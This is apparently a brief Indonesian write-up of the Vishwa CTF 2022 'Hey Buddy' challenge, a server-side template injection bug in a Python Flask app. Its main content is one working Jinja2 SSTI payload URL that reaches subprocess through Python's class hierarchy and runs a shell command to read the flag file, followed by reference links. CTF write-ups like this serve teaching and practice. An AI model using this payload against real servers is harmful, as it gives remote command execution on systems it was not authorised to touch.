Vishwa CTF 2022: Hey Buddy

link : https://h3y-buddy.vishwactf.com

kata kunci

python flask Server-Side Template Injection (SSTI)

Bacaan

• https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee
• https://infosecwriteups.com/tokyowesterns-ctf-4^th-2018-writeup-part-3-1c8510dfad3f

Vulnerable

https://h3y-buddy.vishwactf.com/submit?name={{''.__class__.__mro__[1].__subclasses__()[213]('cat\tflag.txt',shell=True,stdout=-1).communicate()}}

*penjelasan ada pada referensi bacaan

Solusi lain

---

1. https://kashmir54.github.io/ctfs/VishwaCTF2022/#hey-buddy ↩